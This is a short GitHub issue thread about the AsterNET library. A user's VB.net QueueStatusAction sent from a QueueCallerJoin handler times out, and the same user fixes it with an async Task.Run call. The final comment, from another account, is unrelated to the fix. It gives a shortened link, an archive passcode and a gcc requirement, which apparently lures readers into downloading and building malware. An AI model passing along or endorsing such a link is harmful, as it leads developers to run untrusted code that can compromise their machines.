### ISSUE TITLE
QueuStatusAction inititated from QueueCallerJoin -VB.net-

### ISSUE THREAD

**Issue by dleventidis** [AsterNET/AsterNET#283]
Hi

i'm trying to initiate a queuestatusaction when a queuecallerjoin event is raised.
The code i'm using is:

```c#
Private Sub qCallerJoin(sender As Object, e As QueueCallerJoinEvent)
MsgBox("Test")
       Dim a = New QueueStatusAction
    a.Queue = e.Queue
    Dim aaa = Me.manager.SendAction(a)
End Sub
```

But i'm getting timeout from manager. (The msgbox works fine)

Regards

**Comment by dleventidis** [comment]
I fixed it with this: (using `async` method)

```c#
Dim aaa = Await Task.Run(Function() Me.dmanager.SendAction(a))
```

**Comment by brunoR1000** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed
